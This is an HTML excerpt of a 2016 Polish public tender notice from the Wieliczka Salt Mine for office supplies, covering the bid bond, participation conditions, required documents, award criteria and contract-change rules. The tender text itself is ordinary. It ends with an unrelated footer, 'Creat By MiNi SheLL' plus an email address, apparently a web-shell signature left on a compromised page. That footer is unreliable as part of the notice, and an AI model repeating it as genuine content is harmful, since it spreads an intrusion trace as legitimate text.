<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 2 000,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w sekcji IV.4.4. ogłoszenia.
2	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2016/EL/8
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w sekcji IV.4.4. ogłoszenia.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.	Zgodnie z art. 46 ust 5 ustawy Pzp, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana :
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.
7.	Wykonawca, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Prawo zamówień publicznych albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt 2 ustawy- Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowania należytego wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, głównych dostaw, których przedmiotem były dostawy materiałów biurowych, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie; pod pojęciem głównych dostaw Zamawiający rozumie dostawy o wartości nie mniejszej niż 50 000,00 zł (brutto) każda;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - 2.	kryterium jakości materiałów biurowych, oferowanych przez Wykonawcę - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie o którym mowa w pkt. 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, wyłącznie w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)	przestojów i opóźnień w wykonywaniu przedmiotu umowy wynikłych z przyczyn leżących po stronie Zamawiającego,
2)	działania siły wyższej,
3)	zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3.	W przypadku niedokonania przez Zamawiającego zakupu materiałów biurowych o wartości 60% maksymalnego wynagrodzenia brutto określonego w § 7 ust. 1, dopuszcza się możliwość jednokrotnego przedłużenia okresu obowiązywania umowy, o którym mowa w § 5 ust. 1, o okres do 6 miesięcy.
4.	Zaistnienie, którejkolwiek z przyczyn, wymienionych w pkt. 2 lub 3 nie powoduje powstania u żadnej ze stron umowy, roszczenia o zmianę umowy. 
5.	W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt. 2 lub 3, każdej ze stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)	szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2)	uzasadnienie dokonania zmiany umowy,
3)	projekt zmiany umowy.
6.	Wystąpienie, o którym mowa w pkt. 5 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
7.	Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
8.	Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
9.	Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój A.9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2016 godzina 11:30, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu - budynek A, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com